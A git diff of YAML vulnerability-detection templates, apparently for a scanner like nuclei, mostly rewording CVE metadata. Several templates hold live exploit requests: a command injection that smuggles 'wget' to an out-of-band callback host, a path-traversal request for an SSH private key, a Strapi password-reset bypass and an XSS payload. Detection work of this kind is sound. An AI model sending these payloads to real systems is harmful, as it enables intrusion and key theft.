parent
a27f2048df
commit
a24ef794b7
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2012-1823
|
||||
|
||||
info:
|
||||
name: PHP CGI v5.3.12/5.4.2 RCE
|
||||
name: PHP CGI v5.3.12/5.4.2 Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference:
|
||||
|
@ -9,10 +9,9 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2012-1823
|
||||
description: |
|
||||
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
|
||||
remediation: Upgrade to a supported version.
|
||||
tags: rce,php,cve,cve2012
|
||||
classification:
|
||||
cve-id: CVE-2012-1823
|
||||
tags: rce,php,cve,cve2012
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -25,7 +24,6 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
@ -35,4 +33,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/18
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -2,11 +2,13 @@ id: CVE-2014-2321
|
|||
|
||||
info:
|
||||
name: ZTE Cable Modem Web Shell
|
||||
description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
|
||||
description: |
|
||||
ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
|
||||
author: geeknik
|
||||
reference:
|
||||
- https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/
|
||||
- https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-2321
|
||||
severity: high
|
||||
classification:
|
||||
cve-id: CVE-2014-2321
|
||||
|
@ -30,4 +32,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/31
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2016-1555
|
||||
info:
|
||||
name: NETGEAR WNAP320 Access Point Firmware Remote Command Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
reference:
|
||||
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1555
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cve-id: CVE-2016-1555
|
||||
cwe-id: CWE-77
|
||||
tags: netgear,rce,oast,router
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /boardDataWW.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -4,16 +4,18 @@ info:
|
|||
name: Spring Security OAuth2 Remote Command Execution
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: When processing authorization requests using the whitelabel views in Spring Security OAuth 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.
|
||||
description: "Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type."
|
||||
remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
|
||||
- https://tanzu.vmware.com/security/cve-2016-4977
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-4977
|
||||
tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
cve-id: CVE-2016-4977
|
||||
cwe-id: CWE-19
|
||||
tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -30,3 +32,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 400
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -1,18 +1,20 @@
|
|||
id: CVE-2017-10271
|
||||
|
||||
info:
|
||||
name: CVE-2017-10271
|
||||
name: Oracle WebLogic Server Component Remote Command Execution
|
||||
author: dr_set
|
||||
severity: high
|
||||
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
|
||||
description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
|
||||
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
|
||||
tags: cve,cve2017,rce,oracle,weblogic,oast
|
||||
- https://www.oracle.com/security-alerts/cpuoct2017.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-10271
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2017-10271
|
||||
tags: cve,cve2017,rce,oracle,weblogic,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -59,3 +61,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
id: CVE-2017-14535
|
||||
|
||||
info:
|
||||
name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability
|
||||
name: Trixbox - 2.8.0.4 OS Command Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: "Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php."
|
||||
reference:
|
||||
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
|
||||
- https://www.exploit-db.com/exploits/49913
|
||||
tags: cve,cve2017,trixbox,rce,injection
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14535
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
cve-id: CVE-2017-14535
|
||||
cwe-id: CWE-78
|
||||
description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php."
|
||||
tags: cve,cve2017,trixbox,rce,injection
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -36,3 +37,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -1,20 +1,20 @@
|
|||
id: CVE-2017-14537
|
||||
|
||||
info:
|
||||
name: trixbox 2.8.0 - directory-traversal
|
||||
name: Trixbox 2.8.0 Path Traversal
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: cve,cve2017,trixbox,lfi
|
||||
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
|
||||
description: "Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php."
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
|
||||
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
|
||||
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 6.50
|
||||
cve-id: CVE-2017-14537
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2017,trixbox,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -47,3 +47,5 @@ requests:
|
|||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -3,9 +3,8 @@ id: CVE-2017-3506
|
|||
info:
|
||||
name: Oracle Weblogic Remote OS Command Execution
|
||||
author: pdteam
|
||||
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
severity: high
|
||||
tags: cve,cve2017,weblogic,oracle,rce,oast
|
||||
reference:
|
||||
- https://hackerone.com/reports/810778
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
|
||||
|
@ -13,6 +12,7 @@ info:
|
|||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cvss-score: 7.40
|
||||
cve-id: CVE-2017-3506
|
||||
tags: cve,cve2017,weblogic,oracle,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -44,3 +44,5 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -1,17 +1,19 @@
|
|||
id: CVE-2017-6090
|
||||
|
||||
info:
|
||||
name: PhpCollab (unauthenticated) Arbitrary File Upload
|
||||
name: PhpColl 2.5.1 Arbitrary File Upload
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
tags: cve,cve2017,phpcollab,rce,fileupload
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
|
||||
reference:
|
||||
- https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-6090
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
cve-id: CVE-2017-6090
|
||||
cwe-id: CWE-434
|
||||
description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/."
|
||||
description: "PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php."
|
||||
tags: cve,cve2017,phpcollab,rce,fileupload
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -42,3 +44,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
id: CVE-2018-14728
|
||||
|
||||
info:
|
||||
name: Responsive filemanager 9.13.1 - SSRF/LFI
|
||||
name: Responsive filemanager 9.13.1 Server-Side Request Forgery
|
||||
author: madrobot
|
||||
severity: critical
|
||||
tags: cve,cve2018,ssrf,lfi
|
||||
description: "Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter."
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
|
||||
- https://www.exploit-db.com/exploits/45103/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-14728
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-14728
|
||||
cwe-id: CWE-918
|
||||
description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter."
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
|
||||
- https://www.exploit-db.com/exploits/45103/
|
||||
tags: cve,cve2018,ssrf,lfi
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
@ -27,3 +28,5 @@ requests:
|
|||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
id: CVE-2018-15517
|
||||
|
||||
info:
|
||||
name: D-LINK Central WifiManager - SSRF
|
||||
description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
|
||||
name: D-LINK Central WifiManager Server-Side Request Forgery
|
||||
description: "D-LINK Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser."
|
||||
reference:
|
||||
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517
|
||||
author: gy741
|
||||
severity: high
|
||||
tags: cve,cve2018,dlink,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
|
||||
cvss-score: 8.60
|
||||
cve-id: CVE-2018-15517
|
||||
cwe-id: CWE-918
|
||||
tags: cve,cve2018,dlink,ssrf,oast
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -24,3 +25,5 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2018-2791
|
||||
|
||||
info:
|
||||
name: Oracle WebCenter Sites Multiple XSS
|
||||
name: Oracle WebCenter Sites Cross-Site Scripting
|
||||
author: madrobot,leovalcante
|
||||
severity: high
|
||||
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
|
||||
description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
|
||||
cvss-score: 8.20
|
||||
|
@ -15,6 +15,7 @@ info:
|
|||
- http://www.securityfocus.com/bid/103800
|
||||
- https://www.exploit-db.com/exploits/44752/
|
||||
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-2791
|
||||
tags: cve,cve2018,oracle,xss,wcs
|
||||
|
||||
requests:
|
||||
|
@ -41,3 +42,5 @@ requests:
|
|||
- '<script>alert(24)</script>'
|
||||
- 'Missing translation key'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
|
|
@ -1,20 +1,21 @@
|
|||
id: CVE-2018-7490
|
||||
|
||||
info:
|
||||
name: uWSGI PHP Plugin Directory Traversal
|
||||
name: uWSGI PHP Plugin Local File Inclusion
|
||||
author: madrobot
|
||||
severity: high
|
||||
tags: cve,cve2018,uwsgi,php,lfi,plugin
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2018-7490
|
||||
cwe-id: CWE-22
|
||||
description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal."
|
||||
description: "uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion."
|
||||
reference:
|
||||
- https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
|
||||
- https://www.exploit-db.com/exploits/44223/
|
||||
- https://www.debian.org/security/2018/dsa-4142
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-7490
|
||||
tags: cve,cve2018,uwsgi,php,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -30,3 +31,5 @@ requests:
|
|||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -1,14 +1,16 @@
|
|||
id: CVE-2019-13392
|
||||
|
||||
info:
|
||||
name: MindPalette NateMail 3.0.15 - (XSS)
|
||||
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: reflected Cross-Site Scripting (XSS) vulnerability in MindPalette NateMail 3.0.15 allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
|
||||
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
|
||||
reference:
|
||||
- https://www.doyler.net/security-not-included/natemail-vulnerabilities
|
||||
- https://mindpalette.com/tag/natemail/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-13392
|
||||
tags: cve,cve2019,natemail,xss
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
|
@ -37,3 +39,5 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -1,20 +1,20 @@
|
|||
id: CVE-2019-18818
|
||||
|
||||
info:
|
||||
name: Strapi CMS - Admin password reset (Unauthenticated)
|
||||
name: strapi CMS Unauthenticated Admin Password Reset
|
||||
author: idealphase
|
||||
description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
|
||||
severity: critical
|
||||
description: "strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js."
|
||||
reference:
|
||||
- https://github.com/advisories/GHSA-6xc2-mj39-q599
|
||||
- https://www.exploit-db.com/exploits/50239
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-18818
|
||||
severity: critical
|
||||
tags: cve,cve2019,strapi,auth-bypass,intrusive
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2019-18818
|
||||
cwe-id: CWE-640
|
||||
tags: cve,cve2019,strapi,auth-bypass,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -23,9 +23,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -50,3 +48,5 @@ requests:
|
|||
json:
|
||||
- .user.username
|
||||
- .user.email
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -1,17 +1,18 @@
|
|||
id: CVE-2019-2578
|
||||
|
||||
info:
|
||||
name: Broken Access Control Oracle WebCenter Sites
|
||||
name: Oracle WebCenter Sites Broken Access Control
|
||||
author: leovalcante
|
||||
severity: high
|
||||
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
|
||||
reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||
tags: cve,cve2019,oracle,wcs,auth-bypass
|
||||
description: "Oracle WebCenter Sites 12.2.1.3.0 (a component of Oracle Fusion Middleware) suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data."
|
||||
reference:
|
||||
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.60
|
||||
cve-id: CVE-2019-2578
|
||||
|
||||
tags: cve,cve2019,oracle,wcs,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -29,3 +30,5 @@ requests:
|
|||
part: body
|
||||
regex:
|
||||
- '<script[\d\D]*<throwexception/>'
|
||||
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2019-6715
|
||||
|
||||
info:
|
||||
name: CVE-2019-6715
|
||||
name: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
|
||||
author: randomrobbie
|
||||
severity: high
|
||||
description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
|
||||
tags: cve,cve2019,wordpress,wp-plugin,ssrf
|
||||
description: |
|
||||
WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
|
@ -13,6 +13,8 @@ info:
|
|||
reference:
|
||||
- https://vinhjaxt.github.io/2019/03/cve-2019-6715
|
||||
- http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-6715
|
||||
tags: cve,cve2019,wordpress,wp-plugin,ssrf
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -28,3 +30,5 @@ requests:
|
|||
words:
|
||||
- "TmVzc3VzQ29kZUV4ZWNUZXN0"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -4,15 +4,17 @@ info:
|
|||
name: Apache Cocoon 2.1.12 XML Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
tags: cve,cve2020,apache,xml,cocoon,xxe
|
||||
description: When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
|
||||
remediation: Upgrade to Apache Cocon 2.1.13 or later.
|
||||
reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
|
||||
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
|
||||
remediation: Upgrade to Apache Cocoon 2.1.13 or later.
|
||||
reference:
|
||||
- https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11991
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2020-11991
|
||||
cwe-id: CWE-611
|
||||
tags: cve,cve2020,apache,xml,cocoon,xxe
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
@ -39,4 +41,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/02/25
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -4,14 +4,17 @@ info:
|
|||
name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
|
||||
tags: cve,cve2020,zoho,lfi,manageengine
|
||||
reference: https://github.com/BeetleChunks/CVE-2020-12116
|
||||
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
|
||||
reference:
|
||||
- https://github.com/BeetleChunks/CVE-2020-12116
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-12116
|
||||
- https://www.manageengine.com/network-monitoring/help/read-me-complete.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2020-12116
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2020,zoho,lfi,manageengine
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -22,7 +25,7 @@ requests:
|
|||
Connection: close
|
||||
|
||||
- |
|
||||
GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1
|
||||
GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Cache-Control: max-age=0
|
||||
|
@ -44,3 +47,5 @@ requests:
|
|||
- 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
|
||||
- 'status_code_2 == 200'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -1,17 +1,19 @@
|
|||
id: CVE-2020-12720
|
||||
|
||||
info:
|
||||
name: CVE-2020-12720 vBulletin SQLI
|
||||
name: vBulletin SQL Injection
|
||||
author: pdteam
|
||||
severity: critical
|
||||
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
|
||||
reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
tags: cve,cve2020,vbulletin,sqli
|
||||
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.
|
||||
reference:
|
||||
- https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-12720
|
||||
classification:
|
